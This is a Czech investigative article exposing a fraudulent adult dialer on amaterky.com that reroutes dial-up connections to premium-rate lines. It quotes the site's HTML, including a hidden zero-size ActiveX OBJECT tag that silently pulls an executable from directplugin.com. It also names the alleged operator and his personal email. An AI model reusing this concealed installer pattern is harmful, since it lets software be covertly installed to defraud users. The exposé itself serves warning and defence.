Nebezpečné webové stránky v praxi

Podvodné Adult Dialery fungují tak, že přesměrují vaše telefonické připojení k Internetu na telefonní linku s velm výrazným tarifem aniž byste o tom věděli. U českých linek (dvě takové provozuje společnost Aliatel pro své klienty, které pochopitelně odmítá odtajnit) je tarif 60Kč za minutu. U zahraničních linek může jít až o 150Kč a více za minutu.

Narozdíl od legitimních Adult Dialerů fungují podvodné tak, že změní nastavení vašeho telefonického připojení bez vašeho vědomí. Při jejich spuštění k tomu dojde buď automaticky nebo podvodem - například tak, že je není možné ukončit nebo jejich ukončení stejně vede k aktivaci podvodného zásahu do systému.

Jak to celé v praxi funguje? V týdnech předcházejících 15.březnu jste Adult Dialer mohli s jistotou "chytit" například na www.amaterky.com. Titulní stránka nabízející "český volně přístupný erotický server" je pouze lákadlem.

Po kliknutí na kteroukoli z fotogalerií nebo některou z fotografií se zobrazí stránka galerie - ta sestává z několika rámců (frame):

<html>
<head>
<title>Amaterky.com - Girl posing on motorbike</title>
<script language="Javascript">
<!--
top.moveTo(0,0);
top.resizeTo(screen.availWidth,screen.availHeight);
focus();
//-->
</script>
</head>
<frameset rows="70,*" border=0>
<frame name="support" src="galtop.php?PHPSESSID=53a1cad55e8546a29a30b3a61cc06c7f" marginwidth="0" marginheight="0" border="0" frameborder="0">
<frame name="sexlist" src="http://www.beautifuldolls.com/t/1/thehun.html" marginwidth="0" marginheight="0" border="0" frameborder="0">
</frameset>
</html>

Přičemž právě horní rámec (označený jako "support") obsahuje kód pro zavedení Adult dialer programu.

<html>
<body>
<OBJECT classid="clsid:1E89F686-B78D-4C85-9EFC-3474516E3FE2" codeBase="http://directplugin.com/plugin/111133.exe" height=0 id=loader111133 name=loader111133 width=0></OBJECT><center>
<!-- BANNER ONLINE BEGIN -->
<IFRAME src="http://www.banner.cz/showbanner2.php3?L=03d7d1f378ff2b727a8368c79bdd85e9" frameborder="2" scrolling="no" width="468" height="60" marginheight="0" marginwidth="0">
<script src="http://www.banner.cz/showbanner.php3?L=03d7d1f378ff2b727a8368c79bdd85e9" language="JavaScript" type="text/javascript">
</script>
<noscript>
Zapnýte si JavaScript, prosÝm.
</noscript>
</center>
</body>
</html>

Vyvolání kterékoliv z stránek galerie tak bude žádat návštěvníka aby si nainstaloval "Browser Plugin". Stejně tak jako pokud klikne na některý ze tří obrázků na titulní straně.

www.amaterky.com navíc nepochybně vědomě podvádí své návštěvníky tím, že vydává Adult Dialer za "certifikovaný" program a ohání se slovy "Microsoft(tm) Autenticode". Činí tak ovšem pouze poté, co kliknete na některou ze tří úvodních fotografií. Na stránkách galerie je Adult Dialer instalován okamžitě bez jakéhokoliv vysvětlení či varování:

Jde samozřejmě o lež, žádné spojení neselhalo. Ani není problém v internetovém providerovi. Stejně tak nejde o bezpečný program (neznalému uživateli může nebezpečně navýšit telefonní účet) a už vůbec nebyl certifikován společností Microsoft. Jde nepochybně o zcela vědomý a záměrný podvod ve kterém je navíc zneužito případné důvěry v známou společnosti - Microsoft.

Pokud kdokoliv odpoví YES na tento (opět záměrně vyvolávající mylnou představu o povaze věci) dotaz, má o problém postaráno - do svého systému nainstaluje Adult dialer (pocházející od Directplugin.com) a čeká ho případné velké překvapení nad výší telefonního účtu při příštím vyúčtování.

Je ale nutné upozornit, že za případnou výši telefonního účtu si v tomto konkrétním případě můžete jednoznačně sami - jakkoliv se cítíte podvedeni, program jste spustili (aktivovali) sami. Je samozřejmě možné, že jste se stali oběti podvodného Adult Dialeru - ten se podle námi získaných informací šířil například i jako součást e-mail zpráv v průběhu ledna 2003 po celé České republice. Narozdíl od běžného Adult Dialeru (ten vidíte na obrázku s označením Browser Plugin) ale neobsahuje nikdy žádné informace o tom co dělá, kolik to stojí a že se vůbec chystá vytočit spojení přes drahou telefonní linku.

V případě, že jste se stali obětí Adult Dialeru z www.amaterky.com, měli byste vědět, že jeho provozovatelem je Tomas Sapovalov s e-mail adresou djcharlie@seznam.cz  - doména je registrována u www.joker.com a hostována v rámci "SuperHosting.cz" aktivit - s ohledem na české zákony je tedy více než diskutabilní proč se hostingová společnost velmi rychle hostování podobných problematických zákazníku nezřekne.

Je velmi pravděpodobné, že po zveřejnění tohoto odhalení bude Adult Dialer na www.amaterky.com velmi rychle nahrazen za Adult Dialer obsahující více upozornění, případně provozovatel napraví www.amaterky.com tím, že doplní dopředné informace o povaze instalovaného programu. V každém případě má DigiWeb.cz a POOH.CZ zdokumentován stav, který považujeme za odporující českým zákonům.

Pro provozovatele "Adult" webových stránek jsou pochopitelně Adult dialery velkým lákadlem. Snadno jim mohou zajistit příjmy v tisících až deseti tisících korun měsíčně (získávají podíl z protelefonovaných částek). Někteří z nich jdou v honbě za penězi tak daleko, že poskytují vědomě i podvodné verze Adult Dialer programů, případně záměrně skrývají (jako www.amaterky.com) informace o povaze instalovaného programu. Seriózní "Adult" stránky nic takového nedělají. Nemají to zapotřebí, dospělácký obsah je pro řadu lidí dostatečným lákadlem, aby Adult Dialery používali vědomě a věděli co dělají.

Podvodné Adult Dialery by přitom mohly být snadno detekovatelné antivirovými programy. Bohužel antivirové společnosti je jako viry nechápou a odmítají se jim věnovat.

Více též v článcích

Podvodné programy utrácejí za váš telefon
Čerstvé varování Českého Telecomu a několik případů telefonních účtů ve výši desítek tisíc korun. Taková je bilance rozmáhajícího se výskytu programů měnících nastavení vašeho připojení k Internetu...

Co je to ADULT DIALER (POOH.CZ)
aneb poznejte své přátele i nepřátele. Výši svého telefonního účtu se můžete divit až později

Pozor na podvodné stránky (POOH.CZ)
obsahující podvodné Active-X tvářící se nevinně a přitom schopné pumpovat váš telefonní účet.